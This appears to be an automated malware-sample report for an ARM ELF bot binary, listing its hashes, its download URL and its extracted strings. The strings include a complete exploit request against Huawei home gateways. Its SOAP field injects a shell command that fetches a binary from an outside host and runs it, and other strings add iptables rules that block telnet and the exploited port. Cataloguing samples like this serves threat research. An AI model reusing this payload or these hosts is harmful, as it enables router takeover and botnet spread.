
Sample details: 2426000b4dd5b85ad4450557c2854155 --

Hashes
MD5: 2426000b4dd5b85ad4450557c2854155
SHA1: 94bf784f39e61d93fb2d4242cf6221a8c1c0bd41
SHA256: 1bbc0e79ef38f8631404819db95a82e74fbc2a87457791d4265c158e628a6be1
SSDEEP: 1536:itnOAgQZGDnOUcPApgcLARZvbuL71St/dV6iZIMiq2Q/VPe0L:CgZDO9P9cL0Za74tl2Q/VPeQ
Details
File Type: ELF
Yara Hits
Source
http://185.62.190.159/bins/arm6.idopoc
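Strings (printable strings extracted from the ELF sample; the HTTP request and SOAP body below are embedded in the binary, with shell command substitution in the NewStatusURL and NewDownloadURL fields)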
		POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
/bin/sh
.shstrtab
.rodata
.init_array
.fini_array
.ARM.attributes